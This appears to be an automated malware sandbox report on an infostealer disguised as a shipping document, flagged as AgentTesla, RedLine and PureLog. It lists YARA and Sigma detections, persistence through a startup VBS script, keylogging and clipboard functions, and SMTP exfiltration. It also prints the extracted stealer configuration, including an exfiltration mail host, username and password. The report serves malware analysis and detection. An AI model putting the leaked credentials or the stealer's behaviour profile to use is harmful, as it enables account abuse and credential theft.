4.2.juvenile.exe.3840000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.4033190.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.4033190.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.4033190.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.4033190.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.2cbff86.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.2cbff86.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.2cbff86.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.2cbff86.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d8b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d9d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3da3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3daaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3db45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3dbd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.56f0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.56f0000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.56f0000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.56f0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.5560000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.5560000.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.5560000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.5560000.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e72d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e79f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e829:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e8bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e925:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e997:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3ea2d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3eabd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.3fe5570.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.3fe5570.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.3fe5570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.3fe5570.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4052d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x8d265:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4059f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x8d2d7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40629:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x8d361:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x406bb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x8d3f3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40725:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x8d45d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40797:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x8d4cf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x4082d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x8d565:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x408bd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x8d5f5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.juvenile.exe.2080000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 58 88 44 24 2B 88 44 24 2F B0 8B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.RegSvcs.exe.2cbff86.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.2cbff86.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.2cbff86.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.2cbff86.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.56f0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.56f0000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.56f0000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.56f0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d8b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d9d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3da3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3daaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3db45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3dbd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.RegSvcs.exe.3fe6458.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegSvcs.exe.3fe6458.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.RegSvcs.exe.3fe6458.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.RegSvcs.exe.3fe6458.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x8c37d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f6b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x8c3ef:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x8c479:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f7d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x8c50b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f83d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x8c575:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f8af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x8c5e7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x8c67d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f9d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x8c70d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 65 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 6528, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 2948, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49709

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 6528, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\cyclop\juvenile.exe, ProcessId: 3700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.privateemail.com", "Username": "pin@hm-heating-de.icu", "Password": "mGr{)g5TVG3j"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Joe Sandbox ML: detected

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3395906102.00000000030EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: juvenile.exe, 00000002.00000003.2174171140.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000002.00000003.2173530986.0000000003420000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2199863320.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2200019303.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2293946570.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2294278981.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318132849.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318447550.0000000003C80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: juvenile.exe, 00000002.00000003.2174171140.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000002.00000003.2173530986.0000000003420000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2199863320.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000004.00000003.2200019303.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2293946570.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000007.00000003.2294278981.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318132849.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000009.00000003.2318447550.0000000003C80000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006C6CA9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006C60DD
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006C63F9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006CEB60
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CF56F FindFirstFileW,FindClose,	0_2_006CF56F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006CF5FA
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006D1B2F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006D1C8A
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006D1F94
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DB6CA9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00DB60DD
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00DB63F9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DBEB60
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DBF5FA
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBF56F FindFirstFileW,FindClose,	2_2_00DBF56F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DC1B2F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DC1C8A
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DC1F94

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.6:49709 -> 198.54.122.135:587

Source: Joe Sandbox View	IP Address: 198.54.122.135 198.54.122.135
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.6:49709 -> 198.54.122.135:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006D4EB5

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.privateemail.com

Source: RegSvcs.exe, 00000005.00000002.2335172794.000000000304B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.000000000333B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: RegSvcs.exe, 00000005.00000002.2335172794.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.00000000032E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2335172794.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3396205301.00000000032E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 0000000B.00000002.3395099614.000000000149C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000005.00000002.2333247848.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/7
Source: RegSvcs.exe, 00000005.00000002.2333247848.0000000001179000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/f

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, SKTzxzsJw.cs

.Net Code: mWXy4

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_006D6B0C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_006D6D07
